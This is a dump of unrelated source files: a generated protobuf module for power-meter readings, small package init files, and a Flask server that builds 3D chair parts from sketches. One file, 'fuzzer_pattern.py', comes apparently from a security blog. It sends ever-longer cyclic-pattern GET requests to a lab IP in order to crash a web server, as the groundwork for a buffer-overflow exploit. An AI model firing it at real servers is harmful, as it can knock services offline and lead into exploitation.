has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyReacC', full_name='xbospb.WattnodeState.EnergyReacC', index=31,
number=32, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyAppSum', full_name='xbospb.WattnodeState.EnergyAppSum', index=32,
number=33, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyAppA', full_name='xbospb.WattnodeState.EnergyAppA', index=33,
number=34, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyAppB', full_name='xbospb.WattnodeState.EnergyAppB', index=34,
number=35, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyAppC', full_name='xbospb.WattnodeState.EnergyAppC', index=35,
number=36, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerFactorAvg', full_name='xbospb.WattnodeState.PowerFactorAvg', index=36,
number=37, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerFactorA', full_name='xbospb.WattnodeState.PowerFactorA', index=37,
number=38, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerFactorB', full_name='xbospb.WattnodeState.PowerFactorB', index=38,
number=39, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerFactorC', full_name='xbospb.WattnodeState.PowerFactorC', index=39,
number=40, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerReacSum', full_name='xbospb.WattnodeState.PowerReacSum', index=40,
number=41, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerReacA', full_name='xbospb.WattnodeState.PowerReacA', index=41,
number=42, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerReacB', full_name='xbospb.WattnodeState.PowerReacB', index=42,
number=43, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerReacC', full_name='xbospb.WattnodeState.PowerReacC', index=43,
number=44, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerAppSum', full_name='xbospb.WattnodeState.PowerAppSum', index=44,
number=45, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerAppA', full_name='xbospb.WattnodeState.PowerAppA', index=45,
number=46, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerAppB', full_name='xbospb.WattnodeState.PowerAppB', index=46,
number=47, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerAppC', full_name='xbospb.WattnodeState.PowerAppC', index=47,
number=48, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='CurrentA', full_name='xbospb.WattnodeState.CurrentA', index=48,
number=49, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='CurrentB', full_name='xbospb.WattnodeState.CurrentB', index=49,
number=50, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='CurrentC', full_name='xbospb.WattnodeState.CurrentC', index=50,
number=51, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='Demand', full_name='xbospb.WattnodeState.Demand', index=51,
number=52, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DemandMin', full_name='xbospb.WattnodeState.DemandMin', index=52,
number=53, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DemandMax', full_name='xbospb.WattnodeState.DemandMax', index=53,
number=54, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DemandApp', full_name='xbospb.WattnodeState.DemandApp', index=54,
number=55, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DemandA', full_name='xbospb.WattnodeState.DemandA', index=55,
number=56, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DemandB', full_name='xbospb.WattnodeState.DemandB', index=56,
number=57, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='DemandC', full_name='xbospb.WattnodeState.DemandC', index=57,
number=58, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='time', full_name='xbospb.WattnodeState.time', index=58,
number=59, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=48,
serialized_end=2115,
)
_WATTNODESTATE.fields_by_name['EnergySum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyPosSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergySumNR'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyPosSumNr'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltAvgLN'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltAvgLL'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltAB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltBC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['VoltAC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['Freq'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyPosA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyPosB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyPosC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyNegSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyNegSumNR'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyNegA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyNegB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyNegC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyReacSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyReacA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyReacB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyReacC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyAppSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyAppA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyAppB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['EnergyAppC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerFactorAvg'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerFactorA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerFactorB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerFactorC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerReacSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerReacA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerReacB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerReacC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerAppSum'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerAppA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerAppB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['PowerAppC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['CurrentA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['CurrentB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['CurrentC'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['Demand'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['DemandMin'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['DemandMax'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['DemandApp'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['DemandA'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['DemandB'].message_type = nullabletypes__pb2._DOUBLE
_WATTNODESTATE.fields_by_name['DemandC'].message_type = nullabletypes__pb2._DOUBLE
DESCRIPTOR.message_types_by_name['WattnodeState'] = _WATTNODESTATE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
WattnodeState = _reflection.GeneratedProtocolMessageType('WattnodeState', (_message.Message,), dict(
DESCRIPTOR = _WATTNODESTATE,
__module__ = 'wattnode_pb2'
# @@protoc_insertion_point(class_scope:xbospb.WattnodeState)
))
_sym_db.RegisterMessage(WattnodeState)
# @@protoc_insertion_point(module_scope)
[per-file metric and quality-signal columns omitted]
76ad7e0d15716c0c9acafb3659c5dd4c5382ca6d | 63 | py | Python | forms/models/__init__.py | darkismus/kompassi @ 35dea2c7af2857a69cae5c5982b48f01ba56da1f | ["CC-BY-3.0"] | stars: 13 (2015-11-29 -- 2021-02-21) | issues: 23 (2015-04-29 -- 2021-02-10) | forks: 11 (2015-09-20 -- 2020-02-07)
from .form import Form
from .form_response import FormResponse
[per-file metric and quality-signal columns omitted]
4f14767dc53cd58e79e62f6d296ddcb36351be1e | 1,072 | py | Python | fuzzer_pattern.py | JAYMONSECURITY/JMSec-Blog-Resources @ 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | ["MIT"] | stars: 2 (2021-09-08 -- 2022-02-15) | issues: null | forks: 2 (2021-09-09 -- 2022-02-15)
#!/usr/bin/python
import socket
# Fuzz the GET parameter
princi_buffer = "GET "
# adjacent string literals inside the parentheses are concatenated into one payload
buffer = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae"
          "8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj"
          "9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9A"
          "p0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9")
fin_buffer = " HTTP/1.1\r\n\r\n"
while True:
    # grow the payload by 100 filler bytes on every iteration
    buffer = buffer + "\x41" * 100
    request = princi_buffer + buffer + fin_buffer
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect(("192.168.222.134", 80))
        print "Sending a buffer of %d characters" % len(buffer)
        sock.send(request)
        sock.recv(1024)
        sock.close()
    except socket.error:
        # the target stopped answering -- it most likely crashed
        exit()
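# The 'Aa0Aa1Aa2...' payload is a cyclic, non-repeating pattern (pattern_create style): after a crash, the 4 bytes that land in EIP map back to a unique offset inside the buffer.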
[per-file metric and quality-signal columns omitted]
4f4a2f58b2efbce618dd9aa5640332600366d20c | 85 | py | Python | gammapy/makers/background/__init__.py | Rishank2610/gammapy @ 3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76 | ["BSD-3-Clause"] | stars: 155 (2015-02-25 -- 2022-03-13) | issues: 3,131 (2015-01-06 -- 2022-03-31) | forks: 158 (2015-03-16 -- 2022-03-30)
from .fov import *
from .phase import *
from .reflected import *
from .ring import *
[per-file metric and quality-signal columns omitted]
96c81aec84afa63d6b9dbf569516b695426355a7 | 26 | py | Python | examples/minitwit/minitwit/__init__.py | sabikm9876/Dockers9876 @ 5909e26fba86351063bd622cedf6a4c25eba2e79 | ["BSD-3-Clause"] | stars: 2 (2017-11-22 -- 2017-11-22) | issues: null | forks: 5 (2018-04-02 -- 2021-11-01)
from .minitwit import app
[per-file metric and quality-signal columns omitted]
96e41654e9ead4f336205f2af7521f0f740a978e | 121 | py | Python | losses.py | aleXiehta/pytorch_mini_template @ a0d51befa6cf6ac3111f1ca36ff682be004d5686 | ["MIT"] | stars: null | issues: null | forks: 1 (2020-12-25 -- 2020-12-25)
import torch
import torch.nn as nn
import torch.nn.functional as F
def my_loss(y_hat, y):
raise NotImplementedError
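# Hypothetical filled-in example (the template deliberately leaves the loss to
# the user); an L1 reconstruction loss would look like:
# def my_loss(y_hat, y):
#     return F.l1_loss(y_hat, y)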
[per-file metric and quality-signal columns omitted]
8c05668de5b064d1e429c87f34b1c93e043326ea | 107 | py | Python | utils/__init__.py | YooshinCho/pytorch_Convolutional_Unit_Optimization @ 5e405eb410a7cf07839b1dcaf8fb0a422f07d1a7 | ["MIT"] | stars: 8 (2021-09-11 -- 2022-03-14) | issues: 1 (2021-09-10 -- 2021-09-12) | forks: 1 (2021-08-24 -- 2021-08-24)
from __future__ import absolute_import
from .tools import *
from .logger import *
from .function import *
[per-file metric and quality-signal columns omitted]
8c0c263c940bab3dedc935852a26a7159157adc7 | 41 | py | Python | txbillsearch/__init__.py | EdVinyard/TxBillSearch @ 7f4a70dac84d4209b2391a42c72aab0882b258aa | ["MIT"] | stars: null | issues: 3 (2020-03-24 -- 2021-02-02) | forks: null
from .txbillsearch import search, Search
[per-file metric and quality-signal columns omitted]
8c13b616b89ba69ebeb7ba022e1082c702bd7e7c | 33 | py | Python | scrapers/test.py | aldeano19/databucket @ 8a1281f66cf1e545e03fec248dfecee8f3de4b6b | ["Apache-2.0"] | stars: null | issues: null | forks: null
import bs4
print(bs4.__version__)
[per-file metric and quality-signal columns omitted]
8c18f05b15aa8081fe729642e5f20851bab1b131 | 184 | py | Python | examples/timecode.py | voiski/pytago @ 3be793d2381c2353d59b3152ae6bf6617eb2768d | ["MIT"] | stars: 206 (2021-06-24 -- 2022-03-31) | issues: 13 (2021-06-24 -- 2022-02-23) | forks: 14 (2021-06-26 -- 2022-03-30)
import time
def main():
print(time.time())
print(time.time_ns())
print(time.ctime(time.time()))
print(time.ctime(1000000000))
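# 1000000000 seconds after the Unix epoch is 2001-09-09 01:46:40 UTC; ctime() renders it in local time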
if __name__ == '__main__':
main()
[per-file metric and quality-signal columns omitted]
8c1c1191b23e49be318b69b5a6ddca0d08039d3a | 40 | py | Python | djdt_pev/__init__.py | theY4Kman/djdt-pev @ 88162e38239ebbbfe7745baf410fc5b189fc5b9f | ["MIT"] | stars: 2 (2019-05-30 -- 2020-09-12) | issues: null | forks: null
from .panels.pev_sql import PevSQLPanel
| 20
| 39
| 0.85
| 6
| 40
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 1
| 40
| 40
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8c2ce325eae7094c54d3f660277deb50fae0c0a7
| 37,223
|
py
|
Python
|
UI/part_sketch_server/sketch_server.py
|
dongdu3/PartSketcher
|
e6acf14f97c315cc2b8512e7e5c606cbc7ba6438
|
[
"MIT"
] | 2
|
2022-02-20T05:03:53.000Z
|
2022-02-20T08:59:05.000Z
|
UI/part_sketch_server/sketch_server.py
|
dongdu3/PartSketcher
|
e6acf14f97c315cc2b8512e7e5c606cbc7ba6438
|
[
"MIT"
] | null | null | null |
UI/part_sketch_server/sketch_server.py
|
dongdu3/PartSketcher
|
e6acf14f97c315cc2b8512e7e5c606cbc7ba6438
|
[
"MIT"
] | null | null | null |
from flask import Flask, request
from flask import jsonify,make_response
import json
import re
import base64
from io import BytesIO
from io import StringIO,TextIOWrapper
from PIL import Image
import time
import argparse
import torch.backends.cudnn as cudnn
#from dataset_gen import *
from model import *
from common import *
from torchvision.utils import save_image
import torchvision.transforms as transforms
import os
import numpy as np
from utils import binvox_rw
from stl import mesh
import sys
import trimesh
import scipy
from trimesh.voxel import *
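# Flask inference server for PartSketcher: PartGenerator maps a part sketch to a voxel occupancy grid (and mesh), and PartAssembler predicts each part's position and scale within the assembled shape.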
#######################################################################################################
#first we load the model
parser = argparse.ArgumentParser()
parser.add_argument('--dataRoot', type=str, default='/data/dudong/PartNet.v0/dataset', help='data root path')
parser.add_argument('--thres', type=float, default=0.2, help='threshold for occupancy estimation and mesh extraction')
parser.add_argument('--batchSize', type=int, default=1, help='input batch size')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=1)
parser.add_argument('--model', type=str, default='checkpoint', help='model path')
parser.add_argument('--test', type=str, default='test', help='test results path')
parser.add_argument('--cat', type=str, default='Chair')
parser.add_argument('--cuda', type=str, default='0')
parser.add_argument('--spaceSize', type=int, default=128, help='voxel space size for assembly')
opt = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = opt.cuda
cudnn.benchmark = True
vox_res = 64
generator_model_path = './checkpoint/Chair/generator.pt'
generator_network = PartGenerator()
generator_network.load_state_dict(torch.load(generator_model_path,'cpu'))
generator_network.cuda()
generator_network.eval()
# load assemble model
assemble_model_path = './checkpoint/Chair/assembler.pt'
#create assemble network
assemble_network = PartAssembler()
assemble_network.load_state_dict(torch.load(assemble_model_path,map_location='cpu'))
assemble_network.cuda()
assemble_network.eval()
img_transform = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor()
])
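# The server only ever runs inference, so autograd is disabled globally.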
torch.set_grad_enabled(False)
cached_model_list = []
cached_vox_list = []
cached_pose_list = []
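# Dense grid of vox_res**3 occupancy query points spanning [-0.5, 0.5]^3, shaped (1, N, 3) for batched prediction.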
pts = make_3d_grid((-0.5,)*3, (0.5,)*3, (vox_res,)*3).contiguous().view(1, -1, 3)
pts = pts.float()
pts = pts.cuda()
def infer_shape_from_sketch_and_save(img):
sket_data = img_transform(img).float().contiguous()
sket_data = sket_data[:3,:,:]
sket_data = sket_data.unsqueeze(0)
sket_data = sket_data.cuda()
pts_occ_val = generator_network.predict(sket_data, pts)
pts_occ_val = pts_occ_val.contiguous().view(vox_res, vox_res, vox_res).cpu().data.numpy()
out_vox = pts_occ_val
#out_vox = np.array(pts_occ_val + (1. - opt.thres), dtype=np.uint8)
mesh = extract_mesh(pts_occ_val, threshold=opt.thres, n_face_simp=5000)
splitted_mesh = mesh.split()
if len(splitted_mesh) > 0:
chosen_id = -1
max_points = -1
for i in range(0,len(splitted_mesh)):
if (splitted_mesh[i].vertices.shape[0] > max_points):
chosen_id = i
max_points = splitted_mesh[i].vertices.shape[0]
mesh = splitted_mesh[chosen_id]
#trimesh.smoothing.filter_laplacian(mesh)
#mesh = trimesh.smoothing.filter_laplacian(mesh)
trimesh.smoothing.filter_taubin(mesh,iterations=10,nu=0.5,lamb=0.9)
output = mesh.export(file_type='ply',encoding='ascii')
return output, out_vox
def infer_shape_from_sketch_and_save_no_mesh(img):
sket_data = img_transform(img).float().contiguous()
sket_data = sket_data[:3,:,:]
sket_data = sket_data.unsqueeze(0)
sket_data = sket_data.cuda()
pts_occ_val = generator_network.predict(sket_data, pts)
pts_occ_val = pts_occ_val.contiguous().view(vox_res, vox_res, vox_res).cpu().data.numpy()
out_vox = pts_occ_val
# out_vox = np.array(pts_occ_val + (1. - opt.thres), dtype=np.uint8)
#mesh = extract_mesh(pts_occ_val, threshold=opt.thres, n_face_simp=5000)
#output = mesh.export(file_type='ply',encoding='ascii')
return out_vox
def infer_pose_from_sketch(full_img, part_img, part_vox):
full_img_data = img_transform(full_img)[:3,:,:]
part_img_data = img_transform(part_img)[:3,:,:]
sket_data = torch.cat((full_img_data, part_img_data),0)
sket_data = sket_data.unsqueeze(0)
vox_size = part_vox.shape[0]
vox_data = np.array(part_vox).reshape((1,1,vox_size,vox_size,vox_size))
vox_data = torch.from_numpy(vox_data).type(torch.FloatTensor)
sket_data = sket_data.cuda()
vox_data = vox_data.cuda()
pos_pre = assemble_network(sket_data,vox_data)
pos_pre_np = pos_pre.contiguous().view(-1).cpu().data.numpy() * opt.spaceSize
return pos_pre_np
############################################################################################################
app = Flask('woot-sketch-server')
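# Attach permissive CORS headers to every response so the browser-based front end can call this API from another origin.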
def after_request(response):
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers["Access-Control-Allow-Credentials"]="true"
response.headers["Access-Control-Allow-Methods"]="*"
response.headers["Access-Control-Allow-Headers"]= "Content-Type,Access-Token"
response.headers["Access-Control-Expose-Headers"]= "*"
return response
app.after_request(after_request)
@app.route('/add', methods=['POST'])
def add():
print(request.json['a'],request.json['b'])
result = request.json['a'] + request.json['b']
return str(result)
@app.route('/initModel', methods=['POST'])
def initModel():
res = make_response(jsonify({}),200)
return res
image_path_to_save = './images_from_front_end/'
@app.route('/assembleFromImages', methods=['POST'])
def assembleFromImages():
torch.set_grad_enabled(False)
request_dict = json.loads(request.data)
cached_model_list = []
cached_vox_list = []
cached_part_pose_list = []
part_data_list = request_dict['part_image']
whole_image = Image.open(BytesIO(base64.b64decode(request_dict['whole_image'].split(',')[1]))).resize((256,256),Image.LANCZOS)
hx,hy = whole_image.size
fin_whole = Image.new('RGBA', whole_image.size, (255,255,255))
fin_whole.paste(whole_image,(0, 0, hx, hy), whole_image)
# infer
procesed_img_list = []
vox_array_list = []
vox_pose_list = []
vox_center_list = []
vox_length_list = []
for i in range(len(part_data_list)):
current_url = part_data_list[i].split(',')[1]
current_url = base64.b64decode(current_url)
current_url = BytesIO(current_url)
current_img = Image.open(current_url)
current_img = current_img.resize((256,256),Image.LANCZOS)
#add a white background
cx,cy = current_img.size
p = Image.new('RGBA', current_img.size, (255,255,255))
p.paste(current_img, (0, 0, cx, cy), current_img)
procesed_img_list.append(p)
cur_vox = infer_shape_from_sketch_and_save_no_mesh(p)
#cached_model_list.append(str(cur_mesh_bit,encoding='ascii'))
cached_vox_list.append(cur_vox)
vox_array_list.append(cur_vox.tolist())
#calculate the pose
for i in range(len(cached_vox_list)):
current_pose = infer_pose_from_sketch(fin_whole, procesed_img_list[i],cached_vox_list[i])
cached_part_pose_list.append(current_pose)
#vox_pose_list.append(current_pose.tolist())
#part_pos_to_list = [t.tolist() for t in cached_part_pose_list]
#start to assemble
whole_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
#print("part num ",cached_part_pose_list)
center_arr = []
part_center_arr = []
scale_ratio_arr = []
voxel_to_send = []
current_mesh_list = []
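# For each part: take its predicted center/scale, carve the matching box out of the spaceSize^3 assembly grid, map those cells back into part-local coordinates, and copy the part's voxel occupancies across.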
for i in range(len(cached_part_pose_list)):
part_vox = cached_vox_list[i]
part_vox = np.array(part_vox, dtype='uint8')
#print('part vox shape', part_vox.shape)
#part_vox = np.array(part_vox)
part_size = part_vox.shape[0]
part_pos = np.where(part_vox > 0.1)
#print('part pose before',part_pos)
part_pos = np.array(part_pos).transpose()
#print('part pose after',part_pos)
part_bbox_min = np.min(part_pos, axis=0)
part_bbox_max = np.max(part_pos, axis=0)
part_center = (part_bbox_min + part_bbox_max) / 2.
part_scale = np.linalg.norm(part_bbox_max - part_bbox_min) / 2.
